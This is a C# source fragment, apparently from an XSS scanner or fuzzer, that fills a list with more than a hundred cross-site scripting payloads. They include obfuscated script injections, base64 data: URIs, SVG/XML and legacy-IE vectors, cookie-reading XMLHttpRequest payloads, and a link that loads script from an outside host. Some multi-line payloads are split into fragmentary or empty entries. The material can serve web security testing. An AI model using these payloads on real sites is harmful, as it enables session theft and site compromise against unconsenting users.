                payloads.Add(new XSSPayload() { Payload = "<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>"});
                payloads.Add(new XSSPayload() { Payload = "<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();"});
                payloads.Add(new XSSPayload() { Payload = "%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E"});
                payloads.Add(new XSSPayload() { Payload = "<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>"});
                payloads.Add(new XSSPayload() { Payload = "<a target='x' href='xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E"});
                payloads.Add(new XSSPayload() { Payload = "<a target='x' href='xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>"});
                payloads.Add(new XSSPayload() { Payload = "<a target='x' href='xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script>"});
                payloads.Add(new XSSPayload() { Payload = "<a target='x' href='xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();"});
                payloads.Add(new XSSPayload() { Payload = "Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>"});
                payloads.Add(new XSSPayload() { Payload = "<a href='javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;'><button>"});
                payloads.Add(new XSSPayload() { Payload = "<div onmouseover='alert&lpar;1&rpar;'>DIV</div>"});
                payloads.Add(new XSSPayload() { Payload = "<iframe style='position:absolute;top:0;left:0;width:100%;height:100%' onmouseover='prompt(1)'>"});
                payloads.Add(new XSSPayload() { Payload = "<a href='jAvAsCrIpT&colon;alert&lpar;1&rpar;'>X</a>"});
                payloads.Add(new XSSPayload() { Payload = "<embed src='http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf'> ?"});
                payloads.Add(new XSSPayload() { Payload = "<object data='http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf'>?"});
                payloads.Add(new XSSPayload() { Payload = "<var onmouseover='prompt(1)'>On Mouse Over</var>?"});
                payloads.Add(new XSSPayload() { Payload = "<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>"});
                payloads.Add(new XSSPayload() { Payload = "<img src='/' =_=' title='onerror='prompt(1)''>"});
                payloads.Add(new XSSPayload() { Payload = "<%<!--'%><script>alert(1);</script -->"});
                payloads.Add(new XSSPayload() { Payload = "<script src='data:text/javascript,alert(1)'></script>"});
                payloads.Add(new XSSPayload() { Payload = "<iframe/src \\/\\/onload = prompt(1)"});
                payloads.Add(new XSSPayload() { Payload = "<iframe/onreadystatechange=alert(1)"});
                payloads.Add(new XSSPayload() { Payload = "<svg/onload=alert(1)"});
                payloads.Add(new XSSPayload() { Payload = "<input value=<><iframe/src=javascript:confirm(1)"});
                payloads.Add(new XSSPayload() { Payload = "<input type='text' value=``<div/onmouseover='alert(1)'>X</div>"});
                payloads.Add(new XSSPayload() { Payload = "http://www.<script>alert(1)</script .com"});
                payloads.Add(new XSSPayload() { Payload = "<iframe  src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ?"});
                payloads.Add(new XSSPayload() { Payload = "<svg><script ?>alert(1)"});
                payloads.Add(new XSSPayload() { Payload = "<iframe  src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>"});
                payloads.Add(new XSSPayload() { Payload = "<img src=`xx:xx`onerror=alert(1)>"});
                payloads.Add(new XSSPayload() { Payload = "<object type='text/x-scriptlet' data='http://jsfiddle.net/XLE63/ '></object>"});
                payloads.Add(new XSSPayload() { Payload = "<meta http-equiv='refresh' content='0;javascript&colon;alert(1)'/>?"});
                payloads.Add(new XSSPayload() { Payload = "<math><a xlink:href='//jsfiddle.net/t846h/'>click"});
                payloads.Add(new XSSPayload() { Payload = "<embed code='http://businessinfo.co.uk/labs/xss/xss.swf' allowscriptaccess=always>?"});
                payloads.Add(new XSSPayload() { Payload = "<svg contentScriptType=text/vbs><script>MsgBox+1"});
                payloads.Add(new XSSPayload() { Payload = "<a href='data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>'>X</a"});
                payloads.Add(new XSSPayload() { Payload = "<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>"});
                payloads.Add(new XSSPayload() { Payload = "<script>~'\u0061' ;  \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073.  \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+"});
                payloads.Add(new XSSPayload() { Payload = "<script/src='data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')'></script a=\u0061 & /=%2F"});
                payloads.Add(new XSSPayload() { Payload = "<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script ????????????"});
                payloads.Add(new XSSPayload() { Payload = "<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>"});
                payloads.Add(new XSSPayload() { Payload = "<script>+-+-1-+-+alert(1)</script>"});
                payloads.Add(new XSSPayload() { Payload = "<body/onload=&lt;!--&gt;&#10alert(1)>"});
                payloads.Add(new XSSPayload() { Payload = "<script itworksinallbrowsers>/*<script* */alert(1)</script ?"});
                payloads.Add(new XSSPayload() { Payload = "<img src ?itworksonchrome?\\/onerror = alert(1)???"});
                payloads.Add(new XSSPayload() { Payload = "<svg><script>//&NewLine;confirm(1);</script </svg>"});
                payloads.Add(new XSSPayload() { Payload = "<svg><script onlypossibleinopera:-)> alert(1)"});
                payloads.Add(new XSSPayload() { Payload = "<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa  aaaaaaaaa aaaaaaaaaa  href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe"});
                payloads.Add(new XSSPayload() { Payload = "<script x> alert(1) </script 1=2"});
                payloads.Add(new XSSPayload() { Payload = "<div/onmouseover='alert(1)'> style='x:'>"});
                payloads.Add(new XSSPayload() { Payload = "<--`<img/src=` onerror=alert(1)> --!>"});
                payloads.Add(new XSSPayload() { Payload = "<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ?"});
                payloads.Add(new XSSPayload() { Payload = "<div  style='position:absolute;top:0;left:0;width:100%;height:100%'  onmouseover='prompt(1)' onclick='alert(1)'>x</button>?"});
                payloads.Add(new XSSPayload() { Payload = "'><img src=x onerror=window.open('https://www.google.com/');>"});
                payloads.Add(new XSSPayload() { Payload = "<form><button formaction=javascript&colon;alert(1)>CLICKME"});
                payloads.Add(new XSSPayload() { Payload = "<math><a xlink:href='//jsfiddle.net/t846h/'>click"});
                payloads.Add(new XSSPayload() { Payload = "<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?"});
                payloads.Add(new XSSPayload() { Payload = "<iframe  src='data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E'></iframe>"});
                payloads.Add(new XSSPayload() { Payload = "<a  href='data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203'>Click  Me</a>"});
                payloads.Add(new XSSPayload() { Payload = "'><img src=x onerror=prompt(1);>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='1'><form id='test'></form><button form='test' formaction='javascript:alert(1)'>X</button>//[''`-->]]>]</div><div id='2'><meta charset='x-imap4-modified-utf7'>&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi//[''`-->]]>]</div><div id='3'><meta charset='x-imap4-modified-utf7'>&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>//[''`-->]]>]</div><div id='4'>0?<script>Worker('#').onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))//[''`-->]]>]</div><div id='5'><script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(5)',384,null,'rsa-dual-use')</script>//[''`-->]]>]</div><div id='6'><script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>//[''`-->]]>]</div><div id='7'><input onfocus=alert(7) autofocus>//[''`-->]]>]</div><div id='8'><input onblur=alert(8) autofocus><input autofocus>//[''`-->]]>]</div><div id='9'><a style='-o-link:'javascript:alert(9)';-o-link-source:current'>X</a>//[''`-->]]>]</div><div id='10'><video poster=javascript:alert(10)//></video>//[''`-->]]>]</div><div id='11'><svg xmlns='http://www.w3.org/2000/svg'><g onload='javascript:alert(11)'></g></svg>//[''`-->]]>]</div><div id='12'><body onscroll=alert(12)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>//[''`-->]]>]</div><div id='13'><x repeat='template' repeat-start='999999'>0<y repeat='template' repeat-start='999999'>1</y></x>//[''`-->]]>]</div><div id='14'><input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>//[''`-->]]>]</div><div id='15'><script>({0:#0=alert/#0#/#0#(0)})</script>//[''`-->]]>]</div><div id='16'>X<x style=`behavior:url(#default#time2)` onbegin=`alert(16)` >//[''`-->]]>]</div><div id='17'><?xml-stylesheet href='javascript:alert(17)'?><root/>//[''`-->]]>]</div><div id='18'><script xmlns='http://www.w3.org/1999/xhtml'>&#x61;l&#x65;rt&#40;1)</script>//[''`-->]]>]</div><div id='19'><meta charset='x-mac-farsi'>¼script ¾alert(19)//¼/script ¾//[''`-->]]>]</div><div id='20'><script>ReferenceError.prototype.__defineGetter__('name', function(){alert(20)}),x</script>//[''`-->]]>]</div><div id='21'><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(21)')()</script>//[''`-->]]>]</div><div id='22'><input onblur=focus() autofocus><input>//[''`-->]]>]</div><div id='23'><form id=test onforminput=alert(23)><input></form><button form=test onformchange=alert(2)>X</button>//[''`-->]]>]</div><div id='24'>1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=alert(24)&gt;`>//[''`-->]]>]</div><div id='25'><script src='#'>{alert(25)}</script>;1//[''`-->]]>]</div><div id='26'>+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);//[''`-->]]>]</div><div id='27'><style>p[foo=bar{}*{-o-link:'javascript:alert(27)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='28'>1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2)  attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=alert(28)&gt;>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='29'><link rel=stylesheet href=data:,*%7bx:expression(alert(29))%7d//[''`-->]]>]</div><div id='30'><style>@import 'data:,*%7bx:expression(alert(30))%7D';</style>//[''`-->]]>]</div><div id='31'><frameset onload=alert(31)>//[''`-->]]>]</div><div id='32'><table background='javascript:alert(32)'></table>//[''`-->]]>]</div><div id='33'><a style='pointer-events:none;position:absolute;'><a style='position:absolute;' onclick='alert(33);'>XXX</a></a><a href='javascript:alert(2)'>XXX</a>//[''`-->]]>]</div><div id='34'>1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>//[''`-->]]>]</div><div id='35'>1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(35) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>//[''`-->]]>]</div><div id='36'><a style='behavior:url(#default#AnchorClick);' folder='javascript:alert(36)'>XXX</a>//[''`-->]]>]</div><div id='37'><!--<img src='--><img src=x onerror=alert(37)//'>//[''`-->]]>]</div><div id='38'><comment><img src='</comment><img src=x onerror=alert(38)//'>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='39'><!-- up to Opera 11.52, FF 3.6.28 -->"});
                payloads.Add(new XSSPayload() { Payload = "<![><img src=']><img src=x onerror=alert(39)//'>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+  -->"});
                payloads.Add(new XSSPayload() { Payload = "<svg><![CDATA[><image xlink:href=']]><img src=xx:x onerror=alert(2)//'></svg>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='40'><style><img src='</style><img src=x onerror=alert(40)//'>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='41'><li style=list-style:url() onerror=alert(41)></li>"});
                payloads.Add(new XSSPayload() { Payload = "<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(41)></div>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='42'><head><base href='javascript://'/></head><body><a href='/. /,alert(42)//#'>XXX</a></body>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='43'><?xml version='1.0' standalone='no'?>"});
                payloads.Add(new XSSPayload() { Payload = "<html xmlns='http://www.w3.org/1999/xhtml'>"});
                payloads.Add(new XSSPayload() { Payload = "<head>"});
                payloads.Add(new XSSPayload() { Payload = "<style type='text/css'>"});
                payloads.Add(new XSSPayload() { Payload = "@font-face {font-family: y; src: url('font.svg#x') format('svg');} body {font: 100px 'y';}"});
                payloads.Add(new XSSPayload() { Payload = "</style>"});
                payloads.Add(new XSSPayload() { Payload = "</head>"});
                payloads.Add(new XSSPayload() { Payload = "<body>Hello</body>"});
                payloads.Add(new XSSPayload() { Payload = "</html>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='44'><style>*[{}@import'test.css?]{color: green;}</style>X//[''`-->]]>]</div><div id='45'><div style='font-family:'foo[a];color:red;';'>XXX</div>//[''`-->]]>]</div><div id='46'><div style='font-family:foo}color=red;'>XXX</div>//[''`-->]]>]</div><div id='47'><svg xmlns='http://www.w3.org/2000/svg'><script>alert(47)</script></svg>//[''`-->]]>]</div><div id='48'><SCRIPT FOR=document EVENT=onreadystatechange>alert(48)</SCRIPT>//[''`-->]]>]</div><div id='49'><OBJECT CLASSID='clsid:333C7BC4-460F-11D0-BC04-0080C7055A83'><PARAM NAME='DataURL' VALUE='javascript:alert(49)'></OBJECT>//[''`-->]]>]</div><div id='50'><object data='data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>//[''`-->]]>]</div><div id='51'><embed src='data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></embed>//[''`-->]]>]</div><div id='52'><x style='behavior:url(test.sct)'>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='53'><xml id='xss' src='test.htc'></xml>"});
                payloads.Add(new XSSPayload() { Payload = "<label dataformatas='html' datasrc='#xss' datafld='payload'></label>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='54'><script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>//[''`-->]]>]</div><div id='55'><video><source onerror='alert(55)'>//[''`-->]]>]</div><div id='56'><video onerror='alert(56)'><source></source></video>//[''`-->]]>]</div><div id='57'><b <script>alert(57)//</script>0</script></b>//[''`-->]]>]</div><div id='58'><b><script<b></b><alert(58)</script </b></b>//[''`-->]]>]</div><div id='59'><div id='div1'><input value='``onmouseover=alert(59)'></div> <div id='div2'></div><script>document.getElementById('div2').innerHTML = document.getElementById('div1').innerHTML;</script>//[''`-->]]>]</div><div id='60'><div style='[a]color[b]:[c]red'>XXX</div>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='61'><div  style='\\63&#9\06f&#10\0006c&#12\00006F&#13\\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \\&#xA0or:blue;'>XXX</div>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<div id='62'><!-- IE 6-8 -->"});
                payloads.Add(new XSSPayload() { Payload = "<x '='foo'><x foo='><img src=x onerror=alert(62)//'>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<!-- IE 6-9 -->"});
                payloads.Add(new XSSPayload() { Payload = "<! '='foo'><x foo='><img src=x onerror=alert(2)//'>"});
                payloads.Add(new XSSPayload() { Payload = "<? '='foo'><x foo='><img src=x onerror=alert(3)//'>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<div id='63'><embed src='javascript:alert(63)'></embed> // O10.10↓, OM10.0↓, GC6↓, FF"});
                payloads.Add(new XSSPayload() { Payload = "<img src='javascript:alert(2)'>"});
                payloads.Add(new XSSPayload() { Payload = "<image src='javascript:alert(2)'> // IE6, O10.10↓, OM10.0↓"});
                payloads.Add(new XSSPayload() { Payload = "<script src='javascript:alert(3)'></script> // IE6, O11.01↓, OM10.1↓//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='64'><!DOCTYPE x[<!ENTITY x SYSTEM 'http://html5sec.org/test.xxe'>]><y>&x;</y>//[''`-->]]>]</div><div id='65'><svg onload='javascript:alert(65)' xmlns='http://www.w3.org/2000/svg'></svg>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='66'><?xml version='1.0'?>"});
                payloads.Add(new XSSPayload() { Payload = "<?xml-stylesheet type='text/xsl' href='data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(66)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E'?>"});
                payloads.Add(new XSSPayload() { Payload = "<root/>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<div id='67'><!DOCTYPE x ["});
                payloads.Add(new XSSPayload() { Payload = "<!ATTLIST img xmlns CDATA 'http://www.w3.org/1999/xhtml' src CDATA 'xx:x'"});
                payloads.Add(new XSSPayload() { Payload = "onerror CDATA 'alert(67)'"});
                payloads.Add(new XSSPayload() { Payload = "onload CDATA 'alert(2)'>"});
                payloads.Add(new XSSPayload() { Payload = "]><img />//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<div id='68'><doc xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:html='http://www.w3.org/1999/xhtml'>"});
                payloads.Add(new XSSPayload() { Payload = "<html:style /><x xlink:href='javascript:alert(68)' xlink:type='simple'>XXX</x>"});
                payloads.Add(new XSSPayload() { Payload = "</doc>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='69'><card xmlns='http://www.wapforum.org/2001/wml'><onevent type='ontimer'><go href='javascript:alert(69)'/></onevent><timer value='1'/></card>//[''`-->]]>]</div><div id='70'><div style=width:1px;filter:glow onfilterchange=alert(70)>x</div>//[''`-->]]>]</div><div id='71'><// style=x:expression\\28alert(71)\\29>//[''`-->]]>]</div><div id='72'><form><button formaction='javascript:alert(72)'>X</button>//[''`-->]]>]</div><div id='73'><event-source src='event.php' onload='alert(73)'>//[''`-->]]>]</div><div id='74'><a href='javascript:alert(74)'><event-source src='data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A' /></a>//[''`-->]]>]</div><div id='75'><script<{alert(75)}/></script </>//[''`-->]]>]</div><div id='76'><?xml-stylesheet type='text/css'?><!DOCTYPE x SYSTEM 'test.dtd'><x>&x;</x>//[''`-->]]>]</div><div id='77'><?xml-stylesheet type='text/css'?><root style='x:expression(alert(77))'/>//[''`-->]]>]</div><div id='78'><?xml-stylesheet type='text/xsl' href='#'?><img xmlns='x-schema:test.xdr'/>//[''`-->]]>]</div><div id='79'><object allowscriptaccess='always' data='test.swf'></object>//[''`-->]]>]</div><div id='80'><style>*{x:ｅｘｐｒｅｓｓｉｏｎ(alert(80))}</style>//[''`-->]]>]</div><div id='81'><x xmlns:xlink='http://www.w3.org/1999/xlink' xlink:actuate='onLoad' xlink:href='javascript:alert(81)' xlink:type='simple'/>//[''`-->]]>]</div><div id='82'><?xml-stylesheet type='text/css' href='data:,*%7bx:expression(write(2));%7d'?>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='83'><x:template xmlns:x='http://www.wapforum.org/2001/wml'  x:ontimer='$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(83)'><x:timer value='1'/></x:template>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='84'><x xmlns:ev='http://www.w3.org/2001/xml-events' ev:event='load' ev:handler='javascript:alert(84)//#x'/>//[''`-->]]>]</div><div id='85'><x xmlns:ev='http://www.w3.org/2001/xml-events' ev:event='load' ev:handler='test.evt#x'/>//[''`-->]]>]</div><div id='86'><body oninput=alert(86)><input autofocus>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = "<div id='87'><svg xmlns='http://www.w3.org/2000/svg'>"});
                payloads.Add(new XSSPayload() { Payload = "<a xmlns:xlink='http://www.w3.org/1999/xlink' xlink:href='javascript:alert(87)'><rect width='1000' height='1000' fill='white'/></a>"});
                payloads.Add(new XSSPayload() { Payload = "</svg>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<div id='88'><svg xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink'>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<animation xlink:href='javascript:alert(88)'/>"});
                payloads.Add(new XSSPayload() { Payload = "<animation xlink:href='data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E'/>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<image xlink:href='data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E'/>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<foreignObject xlink:href='javascript:alert(88)'/>"});
                payloads.Add(new XSSPayload() { Payload = "<foreignObject xlink:href='data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(88)%3C/script%3E'/>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "</svg>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<div id='89'><svg xmlns='http://www.w3.org/2000/svg'>"});
                payloads.Add(new XSSPayload() { Payload = "<set attributeName='onmouseover' to='alert(89)'/>"});
                payloads.Add(new XSSPayload() { Payload = "<animate attributeName='onunload' to='alert(89)'/>"});
                payloads.Add(new XSSPayload() { Payload = "</svg>//[''`-->]]>]</div>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<div id='90'><!-- Up to Opera 10.63 -->"});
                payloads.Add(new XSSPayload() { Payload = "<div style=content:url(test2.svg)></div>"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<!-- Up to Opera 11.64 - see link below -->"});
                payloads.Add(new XSSPayload() { Payload = ""});
                payloads.Add(new XSSPayload() { Payload = "<!-- Up to Opera 12.x -->"});
